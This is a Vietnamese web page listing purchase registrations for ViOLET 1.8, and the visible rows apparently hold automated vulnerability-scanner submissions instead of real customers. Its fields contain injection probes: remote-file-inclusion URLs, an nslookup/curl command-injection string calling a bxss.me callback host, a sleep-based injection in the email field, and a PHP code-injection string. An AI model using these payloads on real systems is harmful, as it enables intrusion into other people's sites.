Đăng ký mua ViOLET 1.8 : 4716 khách hàng
ID Họ và tên Đơn vị/Cá nhân Mua mới/Nâng cấp Giới tính Đơn vị công tác Chức vụ Điện thoại Email Ghi chú
4387 lwlzjplY 1 Nam http://bxss.me/t/fit.txt?.jpg 1 555-666-0606 testing@example.com Đã gửi email
4386 (nslookup -q=cname hitobaajprmmeb872b.bxss.me||curl hitobaajprmmeb872b.bxss.me)) 1 Nam 1 1 555-666-0606 testing@example.com Đã gửi email
4385 lwlzjplY 1 Nam Http://bxss.me/t/fit.txt 1 555-666-0606 testing@example.com Đã gửi email
4384 lwlzjplY 1 Nam 1 1 555-666-0606 testing@example.com"&&sleep(27*1000)*alvvfs&&" Đã gửi email
4383 lwlzjplY 1 Nam 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg 1 555-666-0606 testing@example.com Đã gửi email
4382 lwlzjplY 1 Nam ${@print(md5(31337))} 1 555-666-0606 testing@example.com Đã gửi email
4381 lwlzjplY 1 Nam 1